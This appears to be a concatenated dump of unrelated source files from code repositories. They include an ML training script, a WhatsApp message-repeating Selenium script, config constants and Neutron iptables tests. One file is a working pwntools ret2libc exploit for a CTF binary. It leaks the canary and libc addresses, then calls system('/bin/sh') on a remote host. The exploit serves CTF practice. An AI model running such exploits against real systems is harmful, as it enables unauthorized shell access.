                "Use --overwrite_output_dir to continue regardless."
            )
    # endregion

    # region Setup logging
    # accelerator.is_local_main_process is only True for one process per machine.
    logger.setLevel(logging.INFO)
    datasets.utils.logging.set_verbosity_warning()
    transformers.utils.logging.set_verbosity_info()
    # endregion

    # If passed along, set the training seed now.
    if training_args.seed is not None:
        set_seed(training_args.seed)

    # region Load datasets
    # Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below)
    # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/
    # (the dataset will be downloaded automatically from the datasets Hub).
    #
    # For CSV/JSON files, this script will use the column called 'text' or the first column if no column called
    # 'text' is found. You can easily tweak this behavior (see below).
    #
    # In distributed training, the load_dataset function guarantee that only one local process can concurrently
    # download the dataset.
    if data_args.dataset_name is not None:
        # Downloading and loading a dataset from the hub.
        raw_datasets = load_dataset(
            data_args.dataset_name,
            data_args.dataset_config_name,
            use_auth_token=True if model_args.use_auth_token else None,
        )
        if "validation" not in raw_datasets.keys():
            # No validation split published: carve one out of the train split.
            raw_datasets["validation"] = load_dataset(
                data_args.dataset_name,
                data_args.dataset_config_name,
                split=f"train[:{data_args.validation_split_percentage}%]",
                use_auth_token=True if model_args.use_auth_token else None,
            )
            raw_datasets["train"] = load_dataset(
                data_args.dataset_name,
                data_args.dataset_config_name,
                split=f"train[{data_args.validation_split_percentage}%:]",
                use_auth_token=True if model_args.use_auth_token else None,
            )
    else:
        data_files = {}
        dataset_args = {}
        if data_args.train_file is not None:
            data_files["train"] = data_args.train_file
        if data_args.validation_file is not None:
            data_files["validation"] = data_args.validation_file
        extension = data_args.train_file.split(".")[-1]
        if extension == "txt":
            extension = "text"
            dataset_args["keep_linebreaks"] = data_args.keep_linebreaks
        raw_datasets = load_dataset(
            extension,
            data_files=data_files,
            use_auth_token=True if model_args.use_auth_token else None,
            **dataset_args,
        )
    # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at
    # https://huggingface.co/docs/datasets/loading_datasets.html.
    # endregion

    # region Load pretrained model and tokenizer
    #
    # In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently
    # download model & vocab.
    if model_args.config_name:
        config = AutoConfig.from_pretrained(model_args.config_name)
    elif model_args.model_name_or_path:
        config = AutoConfig.from_pretrained(model_args.model_name_or_path)
    else:
        config = CONFIG_MAPPING[model_args.model_type]()
        logger.warning("You are instantiating a new config instance from scratch.")

    if model_args.tokenizer_name:
        tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name)
    elif model_args.model_name_or_path:
        tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path)
    else:
        raise ValueError(
            "You are instantiating a new tokenizer from scratch. This is not supported by this script."
            "You can do it from another script, save it, and load it from here, using --tokenizer_name."
        )
    # endregion

    # region Dataset preprocessing
    # First we tokenize all the texts.
    column_names = raw_datasets["train"].column_names
    text_column_name = "text" if "text" in column_names else column_names[0]

    def tokenize_function(examples):
        return tokenizer(examples[text_column_name])

    tokenized_datasets = raw_datasets.map(
        tokenize_function,
        batched=True,
        num_proc=data_args.preprocessing_num_workers,
        remove_columns=column_names,
        load_from_cache_file=not data_args.overwrite_cache,
        desc="Running tokenizer on dataset",
    )

    if data_args.block_size is None:
        block_size = tokenizer.model_max_length
        if block_size > 1024:
            logger.warning(
                f"The tokenizer picked seems to have a very large `model_max_length` ({tokenizer.model_max_length}). "
                "Picking 1024 instead. You can change that default value by passing --block_size xxx."
            )
            block_size = 1024
    else:
        if data_args.block_size > tokenizer.model_max_length:
            logger.warning(
                f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
                f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
            )
        block_size = min(data_args.block_size, tokenizer.model_max_length)

    # Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
    def group_texts(examples):
        # Concatenate all texts.
        concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
        total_length = len(concatenated_examples[list(examples.keys())[0]])
        # We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
        # customize this part to your needs.
        if total_length >= block_size:
            total_length = (total_length // block_size) * block_size
        # Split by chunks of max_len.
        result = {
            k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
            for k, t in concatenated_examples.items()
        }
        result["labels"] = result["input_ids"].copy()
        return result

    # Note that with `batched=True`, this map processes 1,000 texts together, so group_texts throws away a remainder
    # for each of those groups of 1,000 texts. You can adjust that batch_size here but a higher value might be slower
    # to preprocess.
    #
    # To speed up this part, we use multiprocessing. See the documentation of the map method for more information:
    # https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.map
    lm_datasets = tokenized_datasets.map(
        group_texts,
        batched=True,
        num_proc=data_args.preprocessing_num_workers,
        load_from_cache_file=not data_args.overwrite_cache,
        desc=f"Grouping texts in chunks of {block_size}",
    )

    train_dataset = lm_datasets["train"]
    if data_args.validation_file is not None:
        eval_dataset = lm_datasets["validation"]
    else:
        logger.info(
            f"Validation file not found: using {data_args.validation_split_percentage}% of the dataset as validation"
            " as provided in data_args"
        )
        train_indices, val_indices = train_test_split(
            list(range(len(train_dataset))), test_size=data_args.validation_split_percentage / 100
        )
        eval_dataset = train_dataset.select(val_indices)
        train_dataset = train_dataset.select(train_indices)

    if data_args.max_train_samples is not None:
        max_train_samples = min(len(train_dataset), data_args.max_train_samples)
        train_dataset = train_dataset.select(range(max_train_samples))
    if data_args.max_eval_samples is not None:
        max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
        eval_dataset = eval_dataset.select(range(max_eval_samples))

    # Log a few random samples from the training set:
    for index in random.sample(range(len(train_dataset)), 3):
        logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
    # endregion

    with training_args.strategy.scope():
        # region Prepare model
        if checkpoint is not None:
            model = TFAutoModelForCausalLM.from_pretrained(checkpoint, config=config)
        elif model_args.model_name_or_path:
            model = TFAutoModelForCausalLM.from_pretrained(model_args.model_name_or_path, config=config)
        else:
            logger.info("Training new model from scratch")
            model = TFAutoModelForCausalLM.from_config(config)

        model.resize_token_embeddings(len(tokenizer))
        # endregion

        # region TF Dataset preparation
        num_replicas = training_args.strategy.num_replicas_in_sync
        data_collator = DefaultDataCollator(return_tensors="tf")
        options = tf.data.Options()
        options.experimental_distribute.auto_shard_policy = tf.data.experimental.AutoShardPolicy.OFF

        tf_train_dataset = train_dataset.to_tf_dataset(
            # labels are passed as input, as we will use the model's internal loss
            columns=[col for col in train_dataset.features if col != "special_tokens_mask"],
            shuffle=True,
            batch_size=num_replicas * training_args.per_device_train_batch_size,
            collate_fn=data_collator,
            drop_remainder=True,
        ).with_options(options)

        # NOTE(review): eval batching reuses per_device_train_batch_size
        # (not per_device_eval_batch_size) — preserved from the original.
        tf_eval_dataset = eval_dataset.to_tf_dataset(
            # labels are passed as input, as we will use the model's internal loss
            columns=[col for col in eval_dataset.features if col != "special_tokens_mask"],
            shuffle=False,
            batch_size=num_replicas * training_args.per_device_train_batch_size,
            collate_fn=data_collator,
            drop_remainder=True,
        ).with_options(options)
        # endregion

        # region Optimizer and loss
        batches_per_epoch = len(train_dataset) // (num_replicas * training_args.per_device_train_batch_size)
        # Bias and layernorm weights are automatically excluded from the decay
        optimizer, lr_schedule = create_optimizer(
            init_lr=training_args.learning_rate,
            num_train_steps=int(training_args.num_train_epochs * batches_per_epoch),
            num_warmup_steps=training_args.warmup_steps,
            adam_beta1=training_args.adam_beta1,
            adam_beta2=training_args.adam_beta2,
            adam_epsilon=training_args.adam_epsilon,
            weight_decay_rate=training_args.weight_decay,
        )

        # no user-specified loss = will use the model internal loss
        model.compile(optimizer=optimizer)
        # endregion

        # region Training and validation
        logger.info("***** Running training *****")
        logger.info(f"  Num examples = {len(train_dataset)}")
        logger.info(f"  Num Epochs = {training_args.num_train_epochs}")
        logger.info(f"  Instantaneous batch size per device = {training_args.per_device_train_batch_size}")
        logger.info(f"  Total train batch size = {training_args.per_device_train_batch_size * num_replicas}")

        history = model.fit(
            tf_train_dataset,
            validation_data=tf_eval_dataset,
            epochs=int(training_args.num_train_epochs),
            steps_per_epoch=len(train_dataset) // (training_args.per_device_train_batch_size * num_replicas),
            callbacks=[SavePretrainedCallback(output_dir=training_args.output_dir)],
        )
        # Perplexity is exp(loss); guard against overflow for very large losses.
        try:
            train_perplexity = math.exp(history.history["loss"][-1])
        except OverflowError:
            train_perplexity = math.inf
        try:
            validation_perplexity = math.exp(history.history["val_loss"][-1])
        except OverflowError:
            validation_perplexity = math.inf
        logger.info(f"  Final train loss: {history.history['loss'][-1]:.3f}")
        logger.info(f"  Final train perplexity: {train_perplexity:.3f}")
        logger.info(f"  Final validation loss: {history.history['val_loss'][-1]:.3f}")
        logger.info(f"  Final validation perplexity: {validation_perplexity:.3f}")
        # endregion

    if training_args.output_dir is not None:
        model.save_pretrained(training_args.output_dir)

    if training_args.push_to_hub:
        # You'll probably want to include some of your own metadata here!
        model.push_to_hub()


if __name__ == "__main__":
    main()
| [
"noreply@github.com"
] | pvcastro.noreply@github.com |
4a90b353d28203a2b13dd7f10e419572b1551633 | 784eca4391204e2352f320d632e29d37ea136f32 | /PracticeCodes/whatsApp.py | b766433acc83e68763c1dd13d356cee6d98734c7 | [] | no_license | JT4life/PythonCodes | e9d7156cff7b58ad6e1fd253cd645e707be6a5d5 | 148229c14b21dc2a34b7f1446b148b1040a84dad | refs/heads/master | 2022-11-07T03:58:07.850557 | 2020-06-15T22:13:10 | 2020-06-15T22:13:10 | 272,554,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | from selenium import webdriver
#Download Chrome driver and paste in script folder in python !
driver = webdriver.Chrome()
driver.get('https://web.whatsapp.com/')
name = input('Enter the name of user or group : ')
msg = input('Enter your message : ')
count = int(input('Enter the count : '))
input('Enter anything after scanning QR code')
user = driver.find_element_by_xpath('//span[@title = "{}"]'.format(name))
user.click()
msg_box = driver.find_element_by_class_name('_13mgZ')
for i in range(count):
msg_box.send_keys(msg)
button = driver.find_element_by_class_name('_3M-N-')
button.click()
| [
"joshua_4_life@hotmail.com"
] | joshua_4_life@hotmail.com |
0cf32f19f7a7f9aa59508484ced33b621773e946 | 074421d31af92ae29c7c78bdb7e50f199a38eb9b | /weixin/code/rfid_oss/event_manager/command_code.py | 4db7933b49755753bde7e285fbe6ec665b1b3e52 | [] | no_license | allenforrest/wxbiz | 3f49ce66b37e281fc375f548610aa54a0f73268f | e78df71fbc5d73dd93ba9452d4b54183fe1e7e1f | refs/heads/master | 2016-09-06T15:17:49.420934 | 2013-08-05T13:13:40 | 2013-08-05T13:13:40 | null | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 2,184 | py | #coding=gbk
"""
Copyright (C), 2012-2015, Anything Connected Possibilities
Author: ACP2013
Version: 1.0
Date: 2012-11-22
Description: event manager命令码定义文件
Others:
Key Class&Method List:
1. ....
History:
1. Date:2012-11-22
Author:ACP2013
Modification:新建文件
"""
#OSS 命令码
OSS_BASE = 0x02000000
#一个APP分配0x1000个命令码
EVENT_REPORT_BASE = 0x0
########################################################################
#EVENT MANAGER COMMAND CODE
########################################################################
"""
EVENT_REPORT_COMMAND
data区有1个参数
event_data:上报event数据,pickle编码
没有返回信息
"""
EVENT_REPORT_COMMAND = OSS_BASE + EVENT_REPORT_BASE + 0
"""
EVENT_QUERY_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_QUERY_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 1
"""
EVENT_EXPORT_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_EXPORT_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 2
"""
EVENT_EXPORT_TASK_QUERY_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_EXPORT_TASK_QUERY_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 3
"""
EVENT_FILTER_LIST_REQUEST
data区没有参数
返回 EventFilterListResponse 的JSON编码
"""
EVENT_FILTER_LIST_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 4
"""
EVENT_IMC_QUERY_EAU_REQUEST
data区有1个参数
query_req:EventImcQueryEauRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_IMC_QUERY_EAU_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 5
"""
EVENT_QUERY_TO_IMC_REQUEST,消息格式同 EVENT_QUERY_REQUEST,用于IMC向EAU查询
"""
EVENT_QUERY_TO_IMC_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 6
"""
WEB_EVENT_REPORT_COMMAND,用于WEB相关模块向event manager发送事件
"""
WEB_EVENT_REPORT_COMMAND = OSS_BASE + EVENT_REPORT_BASE + 7
if __name__=='__main__':
print EVENT_QUERY_REQUEST, EVENT_EXPORT_REQUEST, EVENT_EXPORT_TASK_QUERY_REQUEST, EVENT_IMC_QUERY_EAU_REQUEST, WEB_EVENT_REPORT_COMMAND
| [
"allenxu@gmail.com"
] | allenxu@gmail.com |
ec593b0300c2aa722f382c36dbd9335956e4a56d | dfcb65de02953afaac24cc926ee32fcdede1ac21 | /src/pyrin/processor/mimetype/enumerations.py | 8547e4fb1a4820fa3604c5a82da52f2bd920b44c | [
"BSD-3-Clause"
] | permissive | mononobi/pyrin | 031d0c38da945b76b07ea100554ffc7f8081b05e | 9d4776498225de4f3d16a4600b5b19212abe8562 | refs/heads/master | 2023-08-31T03:56:44.700142 | 2023-08-20T22:20:06 | 2023-08-20T22:20:06 | 185,481,041 | 20 | 8 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | # -*- coding: utf-8 -*-
"""
mimetype enumerations module.
"""
from pyrin.core.enumerations import CoreEnum
class MIMETypeEnum(CoreEnum):
    """
    mimetype enum.

    Common MIME type string constants for use when emitting or
    matching response content types.
    """

    TEXT = 'text/plain'
    HTML = 'text/html'
    JAVASCRIPT = 'text/javascript'
    OCTET_STREAM = 'application/octet-stream'
    JSON = 'application/json'
| [
"mohamadnobakht@gmail.com"
] | mohamadnobakht@gmail.com |
6b5c8c1161631de22919ca67fea10198953e24c0 | 60f1981f8fb7717a92921c0b7404f6eac06b100b | /Pwn/flag/random_rope.py | 680882cfec123c4fd91d1ae75f50f36746659b1c | [] | no_license | MidnightFlag/CTF2021 | 765d73d227c23cea1df2bbf61a95b2c915be41ee | 5b477472b1491ec7351f75b68f3d8883760e4280 | refs/heads/main | 2023-04-08T13:57:29.767417 | 2021-04-19T18:13:29 | 2021-04-19T18:13:29 | 310,705,849 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,680 | py | #!/usr/bin/env python3
from pwn import *
proc = remote("172.17.0.6", 8888)
libc = ELF("./libc-2.28.so")
#proc = process("/home/kali/Documents/SB/MidnightCTF/PWN/pwn/infra/5_random_rope/random_rope")
#libc = ELF("/lib/i386-linux-gnu/libc.so.6")
leak = proc.recvuntil(b":\n\n").decode()
log.info(leak)
log.info("Parsing the leak...")
leak = leak.split("\n")[1].split(":")[1].split(" ")
if int(leak[-5] )< 0:
canary = (1 << 32) + int(leak[-5])
else:
canary = int(leak[-5])
saved_ebp = (1 << 32) + int(leak[-2])
saved_eip = int(leak[-1])
pc_thunk = int(leak[-3])
pad = int(leak[-4])
log.info("Padding 1 : {}".format(hex(pad)))
log.info("Pc_thunk : {}".format(hex(pc_thunk)))
log.info("Canary : {}".format(hex(canary)))
log.info("Saved EBP : {}".format(hex(saved_ebp)))
log.info("Saved EIP : {}".format(hex(saved_eip)))
log.info("Crafting Payload...")
# Step 1 : Locate a print function (puts, puts...) so we can leak a libc function address by passing a GOT function's entry to it as a parameter.
plt_puts = 0x00001050 # Offset between the base addr and the PLT entry for "puts".
post_vuln_call = 0x00001290 # Offset between the base addr and the instruction that follows the call to "vuln", aka the saved_eip while we are in the "vuln" stackframe.
offset_plt_vuln = post_vuln_call - plt_puts # Offset between post_vuln_call and the PLT entry for the "puts" function.
real_plt_puts = saved_eip - offset_plt_vuln # PLT entry for the "puts" function at runtime.
log.info("PLT entry for 'puts' : {}".format(hex(real_plt_puts)))
# Step 2 : Locate the GOT entry for any function of the LIBC, so we can read the entry using "puts" and leak memory
got_puts = 0x00004014 # GOT entry for "scanf"
offset_got_vuln = got_puts - post_vuln_call # Offset between post_vuln_call and the GOT entry for "scanf"
real_got_puts = saved_eip + offset_got_vuln # GOT entry for the "scanf" function at runtime
log.info("GOT entry for 'puts' : {}".format(hex(real_got_puts)))
# Step 3 : Locate the "main" function address, so we can ret2main after leaking the libc and abuse the buffer overflow again.
main_addr = 0x00001259 # Offset between the base addr and the start of the main function
offset_main_vuln = post_vuln_call - main_addr # Offset between the post_vuln_call and the main
ret2main = saved_eip - offset_main_vuln # "main" function address at runtime
log.info("Main address : {}".format(hex(ret2main)))
# Step 4 : Locate a gadget "pop ebx;ret", so we can use it to control paramaters of the functions we want to call.
gadget = 0x0000101e
offset_pop_vuln = post_vuln_call - gadget
real_gadget = saved_eip - offset_pop_vuln
log.info("POP EBX;RET address : {}".format(hex(real_gadget)))
log.info("Payload : A*32 + canary + padding (A*4) + pc_thunk + saved_ebp + plt_puts + pop ebx;ret + got_scanf + ret2main")
# Step 5 : build the payload and leak libc
payload = b'A' * 32 # Padding to fill the buffer.
payload += p32(canary) # Rewrite Canary, to avoid the stack smashing detection.
payload += b'JUNK' # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(pc_thunk) # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(saved_ebp) # Rewrite the saved EBP.
payload += p32(real_plt_puts) # Rewrite the saved EIP in order to call puts from the PLT stub.
payload += p32(real_gadget) # Clean the Stack because we passed a parameter for puts.
payload += p32(real_got_puts) # Parameter for puts, which is the GOT entry for the scanf function, leaking the libc. (-1 so we are sure to get the whole thing, and to not crash the program)
payload += p32(ret2main) # Ret2main so we can abuse the buffer overflow again.
log.info("Sending payload...")
proc.sendline(payload)
answer = proc.recvuntil(b':\n\n')
log.info("{}".format(answer))
leak_scanf = u32(answer.split(b"\n\n\n")[2][:4])
log.info("'Scanf' function leak : {}".format(hex(leak_scanf)))
log.info("Locating 'system' function and exploiting the overflow again...")
# Step 6 : compute system() address and find a "/bin/sh" string, so we can jump on system() and get a shell
leak_system = leak_scanf - libc.symbols["puts"] + libc.symbols["system"]
leak_binsh = leak_scanf - libc.symbols["puts"] + next(libc.search(b"/bin/sh\x00"))
log.info("'System' function leak : {}".format(hex(leak_system)))
log.info("'/bin/sh\\x00' found at : {}".format(hex(leak_binsh)))
log.info("Crafting Payload...")
# Step 7 : build the final payload and get the shell
payload = b'A' * 32 # Padding to fill the buffer.
payload += p32(canary) # Rewrite Canary, to avoid the stack smashing detection.
payload += b'JUNK' # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(pc_thunk) # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(saved_ebp) # Rewrite the saved EBP -> that's an old EBP, we could use the new saved_ebp value but that's not a need.
payload += p32(leak_system) # Rewrite the saved EIP in order to call the "system" function from the LIBC.
payload += p32(real_gadget) # Clean the Stack because we passed a parameter.
payload += p32(leak_binsh) # Parameter for system "/bin/sh\x00"
log.info("Payload : A*32 + canary + padding (A*4) + pc_thunk + saved_ebp + system + pop ebx;ret + '/bin/sh'")
log.info("Sending payload...")
proc.sendline(payload)
# Step 8 : enjoy ;)
proc.interactive()
| [
"a@example.com"
] | a@example.com |
6e5ba839aad177f589f4dc24bb5b707e6d35e625 | 89f0df65abe01e273fd7cf0606727c777352ba47 | /Python/code_comp/Programmeringsolympiaden/Kalas/bool mash.py | 310e301ab3cd4f230aa659a223e41781f3dcbaca | [] | no_license | cqann/PRGM | 486122601b959cfbf7d9d2dc2a37caa858cf15a8 | 7387dafb65895528c042a3f1ab605fa5325056ce | refs/heads/master | 2022-02-16T00:59:32.342327 | 2022-01-27T16:55:46 | 2022-01-27T16:55:46 | 226,111,892 | 0 | 1 | null | 2020-11-16T17:41:44 | 2019-12-05T13:45:21 | Python | UTF-8 | Python | false | false | 665 | py | import sys
import time
n_kalas, k = [int(x) for x in sys.stdin.readline().split(" ")]
s_w_h = [int(x) for x in sys.stdin.readline().split(" ")]
w_s = [0]
afford = 0
las = -1
hours = 0
list_w_hours = []
list_w_time = []
for i in range(n_kalas):
cur_kalas = [int(x) for x in sys.stdin.readline().split(" ")]
m_n_w = [x for x in cur_kalas[2:] if x not in w_s]
hours += sum([s_w_h[x-1] for x in m_n_w])
w_s += m_n_w
list_w_hours.append(hours)
afford += (cur_kalas[0]-las-1)*10
list_w_time.append(afford)
las = cur_kalas[0]
if all([x >= y for x,y in zip(list_w_time, list_w_hours)]):
print("Ja")
else:
print("Nej")
| [
"cqann.lindberg@gmail.com"
] | cqann.lindberg@gmail.com |
1da24edb58c87a6f4a8613ad31c9849e3494deae | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/103/usersdata/158/50598/submittedfiles/av1_3.py | d2648f5498338309230c4b00a56edb940359b628 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | # -*- coding: utf-8 -*-
import math
a=int(input('digite a:'))
b=int(input('digite b:'))
cont=0
i=1
for i in range(1,b+1,1):
if a%2==0:
cont=cont+1
i=i+1
if cont==0:
print(i)
else:
print('Nao existe')
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
62bd663ff66daf8ad4c15a4551a219a9bfa76552 | afa456bb3792e433d84684260cdce1dbc6302cde | /authors/apps/article/renderer.py | 0941a3177f37f34445aeaec6aa777ad01913eddf | [
"BSD-3-Clause"
] | permissive | andela/ah-backend-poseidon | 23ac16e9fcdce49f78df04126f9f486b8c39ebd4 | d2b561e83ed1e9a585853f4a4e2e37805e86c35c | refs/heads/develop | 2022-12-09T07:38:04.843476 | 2019-07-19T13:44:13 | 2019-07-19T13:44:13 | 158,799,017 | 1 | 4 | BSD-3-Clause | 2022-12-08T01:19:16 | 2018-11-23T07:55:00 | Python | UTF-8 | Python | false | false | 753 | py | """
Renderer classes go here
"""
import json
from rest_framework.renderers import JSONRenderer
class ArticleJSONRenderer(JSONRenderer):
"""
Override default renderer to customise output
"""
charset = 'utf-8'
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
render response data
:param data:
:param accepted_media_type:
:param renderer_context:
:return:
"""
if isinstance(data, list):
errors = None
else:
errors = data.get('errors', None)
if errors is not None:
return super(ArticleJSONRenderer, self).render(data)
return json.dumps({
'articles': data
})
| [
"ephraim.malinga@gmail.com"
] | ephraim.malinga@gmail.com |
f39c8bd81c9f14438fcaf68af7acdfe08b6002a1 | 30227ff573bcec32644fca1cca42ef4cdd612c3e | /leetcode/binary_tree/tests/test_levelorder_traversal.py | 04f4e411c877f489a2031650a1adce5140460d2b | [] | no_license | saurabh-pandey/AlgoAndDS | bc55864422c93e6c93b8432e483394f286ce8ef2 | dad11dedea9ceb4904d6c2dea801ce0172abfc81 | refs/heads/master | 2023-07-01T09:12:57.951949 | 2023-06-15T12:16:36 | 2023-06-15T12:16:36 | 88,239,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | import pytest
import binary_tree.levelorder_traversal as prob
import binary_tree.operations as bTree
class TestPostorderTraversal:
def test_example1_1(self):
root = [3,9,20,None,None,15,7]
res = [[3],[9,20],[15,7]]
rootNode = bTree.createUsingCompleteList(root)
assert prob.levelOrder(rootNode) == res
def test_example1_2(self):
root = [3,9,20,None,None,15,7]
res = [[3],[9,20],[15,7]]
rootNode = bTree.create(root)
assert prob.levelOrder(rootNode) == res | [
"saurabhpandey85@gmail.com"
] | saurabhpandey85@gmail.com |
c56e5bd714efca6e91bff4a72bd13e7dbd1a954a | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5688567749672960_1/Python/frigidrain/A.py | db7c051b27a5e302d31af53d0b46fc3b0d29e195 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | import fileinput
import math
from collections import deque
def flip(n):
res = 0
while(n > 0):
digit = n%10
res = res * 10 + digit
n /= 10
return res
def solve(n):
res = 0
while n > 19:
# print n
if n % 10 == 0:
n -= 1
res += 1
continue
length = len(str(n))
secondhalf = n % (10**(length/2))
# print secondhalf
take = secondhalf - 1
res += take
n -= take
# reverse if it helps
rev = flip(n)
if rev < n:
n = rev
res += 1
# print n
take = n % (10**(length - 1))
res += take + 2
n -= take + 2
return res + n
f = fileinput.input()
T = int(f.readline())
for t in range(T):
n = int(f.readline())
solve(n)
print "Case #{0}: {1}".format(t + 1, solve(n))
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
05f027a2c1c5070d461991e8ee1248b0e5a93a37 | 5aeab8f41edf0ccb92e76b2dce06b693e0635dd6 | /neutron/neutron/tests/unit/agent/linux/test_iptables_firewall.py | acb6666126c2b224ced2b69281235d4c5d2813eb | [
"Apache-2.0"
] | permissive | xjforfuture/openstack | 113e75b0d92e96caf715d4ac258f3c683b8a9894 | 913dbc266ed818519485b2302387e8f0ae198e70 | refs/heads/master | 2022-11-27T04:06:41.982869 | 2017-11-20T08:15:38 | 2017-11-20T08:15:38 | 111,380,539 | 0 | 1 | null | 2020-07-22T22:11:30 | 2017-11-20T08:11:03 | Python | UTF-8 | Python | false | false | 95,094 | py | # Copyright 2012, Nachi Ueno, NTT MCL, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from neutron_lib import constants
from oslo_config import cfg
import testtools
from neutron.agent import firewall
from neutron.agent.linux import ip_conntrack
from neutron.agent.linux import ipset_manager
from neutron.agent.linux import iptables_comments as ic
from neutron.agent.linux import iptables_firewall
from neutron.common import exceptions as n_exc
from neutron.common import utils
from neutron.conf.agent import common as agent_config
from neutron.conf.agent import securitygroups_rpc as security_config
from neutron.tests import base
from neutron.tests.unit.api.v2 import test_base
_uuid = test_base._uuid
#TODO(mangelajo): replace all 'IPv4', 'IPv6' to constants
FAKE_PREFIX = {'IPv4': '10.0.0.0/24',
'IPv6': 'fe80::/48'}
FAKE_IP = {'IPv4': '10.0.0.1',
'IPv6': 'fe80::1'}
#TODO(mangelajo): replace all '*_sgid' strings for the constants
FAKE_SGID = 'fake_sgid'
OTHER_SGID = 'other_sgid'
_IPv6 = constants.IPv6
_IPv4 = constants.IPv4
RAW_TABLE_OUTPUT = """
# Generated by iptables-save v1.4.21 on Fri Jul 31 16:13:28 2015
*raw
:PREROUTING ACCEPT [11561:3470468]
:OUTPUT ACCEPT [11504:4064044]
:neutron-openvswi-OUTPUT - [0:0]
:neutron-openvswi-PREROUTING - [0:0]
-A PREROUTING -j neutron-openvswi-PREROUTING
-A OUTPUT -j neutron-openvswi-OUTPUT
-A neutron-openvswi-PREROUTING -m physdev --physdev-in qvbe804433b-61 -j CT --zone 1
-A neutron-openvswi-PREROUTING -m physdev --physdev-in tape804433b-61 -j CT --zone 1
-A neutron-openvswi-PREROUTING -m physdev --physdev-in qvb95c24827-02 -j CT --zone 2
-A neutron-openvswi-PREROUTING -m physdev --physdev-in tap95c24827-02 -j CT --zone 2
-A neutron-openvswi-PREROUTING -m physdev --physdev-in qvb61634509-31 -j CT --zone 2
-A neutron-openvswi-PREROUTING -m physdev --physdev-in tap61634509-31 -j CT --zone 2
-A neutron-openvswi-PREROUTING -m physdev --physdev-in qvb8f46cf18-12 -j CT --zone 9
-A neutron-openvswi-PREROUTING -m physdev --physdev-in tap8f46cf18-12 -j CT --zone 9
COMMIT
# Completed on Fri Jul 31 16:13:28 2015
""" # noqa
class BaseIptablesFirewallTestCase(base.BaseTestCase):
def setUp(self):
super(BaseIptablesFirewallTestCase, self).setUp()
security_config.register_securitygroups_opts()
agent_config.register_root_helper(cfg.CONF)
cfg.CONF.set_override('comment_iptables_rules', False, 'AGENT')
self.utils_exec_p = mock.patch(
'neutron.agent.linux.utils.execute')
self.utils_exec = self.utils_exec_p.start()
self.iptables_cls_p = mock.patch(
'neutron.agent.linux.iptables_manager.IptablesManager')
iptables_cls = self.iptables_cls_p.start()
self.iptables_inst = mock.Mock()
self.v4filter_inst = mock.Mock()
self.v6filter_inst = mock.Mock()
self.iptables_inst.ipv4 = {'filter': self.v4filter_inst,
'raw': self.v4filter_inst
}
self.iptables_inst.ipv6 = {'filter': self.v6filter_inst,
'raw': self.v6filter_inst
}
iptables_cls.return_value = self.iptables_inst
self.iptables_inst.get_rules_for_table.return_value = (
RAW_TABLE_OUTPUT.splitlines())
self.firewall = iptables_firewall.IptablesFirewallDriver()
self.firewall.iptables = self.iptables_inst
# don't mess with sysctl knobs in unit tests
self.firewall._enabled_netfilter_for_bridges = True
# initial data has 1, 2, and 9 in use, see RAW_TABLE_OUTPUT above.
